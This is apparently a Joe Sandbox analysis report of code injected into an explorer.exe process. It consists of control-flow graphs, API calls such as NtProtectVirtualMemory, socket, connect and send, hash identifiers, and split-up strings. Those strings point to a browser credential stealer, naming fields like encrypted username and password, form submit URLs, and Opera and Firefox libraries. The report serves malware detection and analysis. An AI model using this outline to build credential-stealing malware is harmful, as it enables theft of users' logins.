                                                                                                                      control_flow_graph 299 e90f232-e90f256 300 e90f25c-e90f260 299->300 301 e90f8bd-e90f8cd 299->301 300->301 302 e90f266-e90f2a0 300->302 303 e90f2a2-e90f2a6 302->303 304 e90f2bf 302->304 303->304 305 e90f2a8-e90f2ac 303->305 306 e90f2c6 304->306 307 e90f2b4-e90f2b8 305->307 308 e90f2ae-e90f2b2 305->308 309 e90f2cb-e90f2cf 306->309 307->309 310 e90f2ba-e90f2bd 307->310 308->306 311 e90f2d1-e90f2f7 call e90f942 309->311 312 e90f2f9-e90f30b 309->312 310->309 311->312 316 e90f378 311->316 312->316 317 e90f30d-e90f332 312->317 320 e90f37a-e90f3a0 316->320 318 e90f3a1-e90f3a8 317->318 319 e90f334-e90f33b 317->319 321 e90f3d5-e90f3dc 318->321 322 e90f3aa-e90f3d3 call e90f942 318->322 323 e90f366-e90f370 319->323 324 e90f33d-e90f360 call e90f942 319->324 326 e90f410-e90f458 NtCreateFile call e90f172 321->326 327 e90f3de-e90f40a call e90f942 321->327 322->316 322->321 323->316 329 e90f372-e90f373 323->329 324->323 335 e90f45d-e90f45f 326->335 327->316 327->326 329->316 335->316 336 e90f465-e90f46d 335->336 336->316 337 e90f473-e90f476 336->337 338 e90f486-e90f48d 337->338 339 e90f478-e90f481 337->339 340 e90f4c2-e90f4ec 338->340 341 e90f48f-e90f4b8 call e90f942 338->341 339->320 347 e90f4f2-e90f4f5 340->347 348 e90f8ae-e90f8b8 340->348 341->316 346 e90f4be-e90f4bf 341->346 346->340 349 e90f604-e90f611 347->349 350 e90f4fb-e90f4fe 347->350 348->316 349->320 351 e90f500-e90f507 350->351 352 e90f55e-e90f561 350->352 355 e90f538-e90f559 351->355 356 e90f509-e90f532 call e90f942 351->356 357 e90f616-e90f619 352->357 358 e90f567-e90f572 352->358 364 e90f5e9-e90f5fa 355->364 356->316 356->355 362 e90f6b8-e90f6bb 357->362 363 e90f61f-e90f626 357->363 359 e90f5a3-e90f5a6 358->359 360 e90f574-e90f59d call e90f942 358->360 359->316 366 e90f5ac-e90f5b6 359->366 360->316 360->359 367 e90f739-e90f73c 362->367 368 e90f6bd-e90f6c4 362->368 370 e90f657-e90f66b call e910e92 
363->370 371 e90f628-e90f651 call e90f942 363->371 364->349 366->316 376 e90f5bc-e90f5e6 366->376 372 e90f742-e90f749 367->372 373 e90f7c4-e90f7c7 367->373 377 e90f6f5-e90f734 368->377 378 e90f6c6-e90f6ef call e90f942 368->378 370->316 387 e90f671-e90f6b3 370->387 371->316 371->370 380 e90f77a-e90f7bf 372->380 381 e90f74b-e90f774 call e90f942 372->381 373->316 383 e90f7cd-e90f7d4 373->383 376->364 392 e90f894-e90f8a9 377->392 378->348 378->377 380->392 381->348 381->380 388 e90f7d6-e90f7f6 call e90f942 383->388 389 e90f7fc-e90f803 383->389 387->320 388->389 396 e90f805-e90f825 call e90f942 389->396 397 e90f82b-e90f835 389->397 392->320 396->397 397->348 398 e90f837-e90f83e 397->398 398->348 403 e90f840-e90f886 398->403 403->392
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2641213519.000000000E8E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E8E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_e8e0000_explorer.jbxd
Similarity
• API ID: CreateFile
• String ID: `
• API String ID: 823142352-2679148245
• Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
• Instruction ID: 5cd49ee399dbc8dcd317c5badba3e1ec6bb08a720f1164e5733bd46d27260a77
• Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
• Instruction Fuzzy Hash: 33223F70B18B099FCB69DF28C4996ADF7E1FB98301F90462ED45ED7290DB30A951CB81

Control-flow Graph

control_flow_graph 443 e910e12-e910e6e call e90f942 NtProtectVirtualMemory 446 e910e70-e910e7c 443->446 447 e910e7d-e910e8f 443->447
APIs
• NtProtectVirtualMemory.NTDLL ref: 0E910E67
Memory Dump Source
• Source File: 00000004.00000002.2641213519.000000000E8E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E8E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_e8e0000_explorer.jbxd
Similarity
• API ID: MemoryProtectVirtual
• String ID:
• API String ID: 2706961497-0
• Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
• Instruction ID: 84a117715bd409947cf3f8e736f1f7e5d3e02214573dc7d75115e948e3eb62bd
• Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
• Instruction Fuzzy Hash: BC019230628B484F8784EF6C9484226B7E4FBD9314F000B3EA59AC3250D760D5414B42

Control-flow Graph

control_flow_graph 448 e910e0a-e910e38 449 e910e45-e910e6e NtProtectVirtualMemory 448->449 450 e910e40 call e90f942 448->450 451 e910e70-e910e7c 449->451 452 e910e7d-e910e8f 449->452 450->449
APIs
• NtProtectVirtualMemory.NTDLL ref: 0E910E67
Memory Dump Source
• Source File: 00000004.00000002.2641213519.000000000E8E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E8E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_e8e0000_explorer.jbxd
Similarity
• API ID: MemoryProtectVirtual
• String ID:
• API String ID: 2706961497-0
• Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
• Instruction ID: f89c20ceddef718c06596207d3405d34c41c0c5ae2f843f4b3cd6f8f84dad38a
• Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
• Instruction Fuzzy Hash: 7201A73462CB884F8744EB2C94452A6B3E5FBCE314F400B7EE59AC3240DB21D5014B82

Control-flow Graph

APIs
• ObtainUserAgentString.URLMON ref: 0E90A9A0
Strings
Memory Dump Source
• Source File: 00000004.00000002.2641213519.000000000E8E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E8E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_e8e0000_explorer.jbxd
Similarity
• API ID: AgentObtainStringUser
• String ID: User-Agent: $nt: $on.d$urlmon.dll
• API String ID: 2681117516-319646191
• Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
• Instruction ID: b2de6ae7621a3812eaf08a751012ca963c36ca0d98c4dad94877397ccea6efab
• Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
• Instruction Fuzzy Hash: 1A31DF71A14B4C8FCB04EFA8C8847EEB7E1FF98205F40062AD45ED7250DE788A45CB89

Control-flow Graph

APIs
• ObtainUserAgentString.URLMON ref: 0E90A9A0
Strings
Memory Dump Source
• Source File: 00000004.00000002.2641213519.000000000E8E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E8E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_e8e0000_explorer.jbxd
Similarity
• API ID: AgentObtainStringUser
• String ID: User-Agent: $nt: $on.d$urlmon.dll
• API String ID: 2681117516-319646191
• Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
• Instruction ID: c2e4ae90e86fcf19aed68c4e8c9f49086013d3ba904dfeac4172c26869d58849
• Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
• Instruction Fuzzy Hash: 6321E470A10B4C8FCB04EFA9C8847EDBBE5FF98205F80466AD45AD7250DF748A45CB89

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2641213519.000000000E8E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E8E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_e8e0000_explorer.jbxd
Similarity
• API ID: CreateMutex
• String ID: .dll$el32$kern
• API String ID: 1964310414-1222553051
• Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
• Instruction ID: 97dc45a44c05e055a13b417dc6fcd018654bb5f0d3ec1d20f6182df72d3bc657
• Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
• Instruction Fuzzy Hash: 86417D70918A0C8FDB94EFA8C4947AD77E4FF98300F44467AD84EDB295DE309945CB85

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2641213519.000000000E8E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E8E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_e8e0000_explorer.jbxd
Similarity
• API ID: CreateMutex
• String ID: .dll$el32$kern
• API String ID: 1964310414-1222553051
• Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
• Instruction ID: d9d1e1d2ec631d1232e5d2a6459cff824d9f46b51005a52a5a8911e1862ecaa2
• Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
• Instruction Fuzzy Hash: 93415970918A0C8FDB94EFA8C498BAD77E0FFA8300F44456AC94EDB256DE309945CB85

Control-flow Graph

control_flow_graph 289 e90c72e-e90c768 290 e90c788-e90c7ab connect 289->290 291 e90c76a-e90c782 call e90f942 289->291 291->290
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2641213519.000000000E8E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E8E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_e8e0000_explorer.jbxd
Similarity
• API ID: connect
• String ID: conn$ect
• API String ID: 1959786783-716201944
• Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
• Instruction ID: 58ca20db5169138c79ee8ef12397fc7704613ac8e73f5caa1f4c5c7b4cc87be5
• Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
• Instruction Fuzzy Hash: 67014C30618B188FCB94EF1CE088B55B7E0EB98314F1545AAA90DCB266C674D9818BC2

Control-flow Graph

control_flow_graph 294 e90c732-e90c768 295 e90c788-e90c7ab connect 294->295 296 e90c76a-e90c782 call e90f942 294->296 296->295
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2641213519.000000000E8E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E8E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_e8e0000_explorer.jbxd
Similarity
• API ID: connect
• String ID: conn$ect
• API String ID: 1959786783-716201944
• Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
• Instruction ID: bb635a95b58e43fdfd754e84874b7c35fc12b19ee9432d147d4025251fafa7b6
• Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
• Instruction Fuzzy Hash: 83012C70618A1C8FCB94EF5CE088B55B7E0FB99314F1545AEA90DCB266CB74CD818BC2

Control-flow Graph

control_flow_graph 407 e90c6b2-e90c6e5 408 e90c705-e90c72d send 407->408 409 e90c6e7-e90c6ff call e90f942 407->409 409->408
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2641213519.000000000E8E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E8E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_e8e0000_explorer.jbxd
Similarity
• API ID: send
• String ID: send
• API String ID: 2809346765-2809346765
• Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
• Instruction ID: 381a234996a7795c690b67d134d42c0c86e2e87f4140630832cb36e9a7e92ac4
• Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
• Instruction Fuzzy Hash: 74011270618A188FDBC4EF1CD048B25B7E0EB98314F5546AED85DCB266C670D8818B85

Control-flow Graph

control_flow_graph 412 e90c5b2-e90c5ea 413 e90c60a-e90c62b socket 412->413 414 e90c5ec-e90c604 call e90f942 412->414 414->413
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2641213519.000000000E8E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E8E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_e8e0000_explorer.jbxd
Similarity
• API ID: socket
• String ID: sock
• API String ID: 98920635-2415254727
• Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
• Instruction ID: d6dfbc7fa596ddc9d753a7443731073b271645207895f2199b24dc8341f98a60
• Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
• Instruction Fuzzy Hash: 730121706186188FCB84EF5CD048B55BBE0FB59314F1545ADE45EDB266C7B0C9818B86

Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641213519.000000000E8E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E8E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e8e0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Sleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3472027048-0
                                                                                                                      • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                                      • Instruction ID: b15ab9a17a2b4986ce281910e652daefc7ff0e8cb02e77a0c395f551f0659d48
                                                                                                                      • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                                      • Instruction Fuzzy Hash: 58318D70614B09DFDB68EF2980482A5B3A1FB94301F84567ECE2DCB146C730A8A0CFD1

                                                                                                                      Control-flow Graph (rendered graph not available; edge list follows)
                                                                                                                      control_flow_graph 453 e904412-e904446 call e90f942 456 e904473-e90447d 453->456 457 e904448-e904472 call e911c9e CreateThread 453->457
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641213519.000000000E8E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E8E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e8e0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2422867632-0
                                                                                                                      • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                      • Instruction ID: f465a38f2b9184a427a03524674fe9d25d8610ddcb5e811b92ef0809e51eeabc
                                                                                                                      • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                      • Instruction Fuzzy Hash: DBF0FC30368A4C4FD784EF2CD44563AF3D0FBE9214F44053EA54DC3254DA35C9814B15
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                                                                                      • API String ID: 0-393284711
                                                                                                                      • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                      • Instruction ID: 3e36088e76734b6d80967b84242bb702187d073f082b93637e979934fe099684
                                                                                                                      • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                      • Instruction Fuzzy Hash: 07E16C70518F488FC7A8EF78C4947AAB7E1FB58301F504A2E959BC7266DF30A941CB85
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                                                                                      • API String ID: 0-2916316912
                                                                                                                      • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                      • Instruction ID: 1ebcbc1d0807ab417adba7694018fd47c3d64b8779a6ba8cae80331b6d788c61
                                                                                                                      • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                      • Instruction Fuzzy Hash: B6B18030518B488EDB59EF68C489ADEB7F1FF58300F50491ED49AC7262EF70A905CB96
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                                                                      • API String ID: 0-1539916866
                                                                                                                      • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                      • Instruction ID: cb33755aca0281df4fb3ab3343c3d92e6200739dc09a4193adee039515082bcb
                                                                                                                      • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                      • Instruction Fuzzy Hash: 8A41D370A18B488FDB58EF9CA4596BD7BF2FB48700F10025ED449D3262DB709D458BD6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                                                                      • API String ID: 0-355182820
                                                                                                                      • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                      • Instruction ID: 6ebfaf7c235035ec781c2e65c4306bad3da282ab1a2c93d6c257285195dc9a33
                                                                                                                      • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                      • Instruction Fuzzy Hash: A1C15B71618B098FC798EF34C4996DAF3E1FB98304F504B2E959AC7221DF70A915CB86
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                                                                                      • API String ID: 0-97273177
                                                                                                                      • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                      • Instruction ID: 69d7fa096f1edfd99ff6fa16b3433be926a8555bcfb95a186fb526afb0477213
                                                                                                                      • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                      • Instruction Fuzzy Hash: 8E51F5315187488FD759DF28D4852AAB7E5FBC5300F601A2EE8CBC7252DBB49906CB82
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                      • API String ID: 0-639201278
                                                                                                                      • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                      • Instruction ID: c9e90114ed13d30210fd47b7ca02c788f663e561431ed28829fa4b0e725325be
                                                                                                                      • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                      • Instruction Fuzzy Hash: 0BC1B270618A198FC798EF78D459AAAF3E1FB94300FA4472D844AD7266DF30AD01CBC5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                      • API String ID: 0-639201278
                                                                                                                      • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                      • Instruction ID: 43eaa306a3c9cba0ec812c5505508f3a9fb0de50c6fb0a7d1c1064bceeeb8334
                                                                                                                      • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                      • Instruction Fuzzy Hash: 2BC1A270618A198FC798EF78D459AAAF3E1FB94300FA5472D844AD7266DF30AD01CBC5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                      • API String ID: 0-2058692283
                                                                                                                      • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                      • Instruction ID: be2bcf0dfc9257d4107c4d82bcc0e791a250e4c83a2741fefe05a575d791ef3e
                                                                                                                      • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                      • Instruction Fuzzy Hash: 9BA1917061874C8BDB59EFA8D4447EEB7E1FF84300F50462DE48AD7252EF7099458B89
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                      • API String ID: 0-2058692283
                                                                                                                      • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                      • Instruction ID: 4b11a054fb84c12bc717c7a4e2d81510d6ea944119dfb7dc1133740688624dbf
                                                                                                                      • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                      • Instruction Fuzzy Hash: 8491907061874C8BDB59EFA8D444BEEB7E1FF88300F50462EE48AD7252EF7099458B85
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $.$e$n$v
                                                                                                                      • API String ID: 0-1849617553
                                                                                                                      • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                      • Instruction ID: 123b4d9e048fb96b539be062b872d2fc525e031d3e0ac05829efac9a97aac7a8
                                                                                                                      • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                      • Instruction Fuzzy Hash: E3718331A18A4C8FD758EF68C4887AAB7F1FF58304F10062ED45AD7262EB719D458B41
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                                                      • API String ID: 0-1970020201
                                                                                                                      • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                      • Instruction ID: a1442d62c27c4102f3c7d8eae8a7579ead3b5b142c73b6385cdca2a563778036
                                                                                                                      • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                      • Instruction Fuzzy Hash: DC515EB0914B4C8FDB54EFA4C045AEEB7F1FF58301F504A2E949AE7255EF3099418B89
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 4$\$dll$ion.$vers
                                                                                                                      • API String ID: 0-1610437797
                                                                                                                      • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                      • Instruction ID: 92f49ce44d6a39717eba17c8a1ace42e815db18e03f722378569eb6106f250be
                                                                                                                      • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                      • Instruction Fuzzy Hash: 5A416230618B4C8FCBA9EF3498557EA73E5FB98301F50462E988EC7251EF30D9458782
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 32.d$cli.$dll$sspi$user
                                                                                                                      • API String ID: 0-327345718
                                                                                                                      • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                      • Instruction ID: e13935c7902a602bfcbbea176ddf501ac1808662fa5c0f5db14a1da1eadd9b53
                                                                                                                      • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                      • Instruction Fuzzy Hash: 72417730619E4DDFCB94EF7880A47AD77E1FB58300F604669A80ED7262EA70C9409BC6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .dll$el32$h$kern
                                                                                                                      • API String ID: 0-4264704552
                                                                                                                      • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                      • Instruction ID: 5d2f25836a85ffc5b9c9860b887c3dc05e573ce5f520627e7fb25c874d1e8826
                                                                                                                      • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                      • Instruction Fuzzy Hash: A2418570608B484FD7A9DF3880887AAB7E1FB98301F204B2E949EC3666DB70D945CB41
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
